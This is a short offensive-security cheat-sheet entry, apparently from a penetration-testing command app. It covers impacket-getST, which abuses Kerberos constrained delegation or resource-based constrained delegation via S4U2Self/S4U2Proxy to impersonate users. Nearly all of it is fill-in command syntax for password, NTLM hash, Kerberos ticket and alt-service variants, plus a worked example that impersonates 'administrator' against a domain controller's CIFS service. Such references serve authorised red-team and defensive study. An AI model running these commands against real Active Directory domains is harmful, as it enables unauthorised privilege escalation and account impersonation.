Impacket getST (S4U)

Abuse constrained delegation or RBCD via S4U2Self/S4U2Proxy to impersonate a user

Tool
impacket-getST
Category
Privilege Escalation / Delegation Abuse
Platform
linux
Requires
password
Protocols
KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-getST -spn '<service>/<target_host>' -impersonate '<target_user>' '<domain>/<user>:<password>' -dc-ip <ip>

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-getST -spn '<service>/<target_host>' -impersonate '<target_user>' -hashes ':<hash>' '<domain>/<user>' -dc-ip <ip>

Kerberos Ticket requires Kerberos ticket

impacket-getST -spn '<service>/<target_host>' -impersonate '<target_user>' -k -no-pass '<domain>/<user>' -dc-ip <ip>

Alt-Service Swap requires NTLM hash

impacket-getST -spn '<service>/<target_host>' -impersonate '<target_user>' -hashes ':<hash>' '<domain>/<user>' -dc-ip <ip> -altservice '<alt_service>'

Examples

impacket-getST -spn 'cifs/dc01.corp.local' -impersonate 'administrator' 'corp.local/svc_account:password' -dc-ip 192.168.1.100

Tags

impacket s4u delegation constrained rbcd impersonation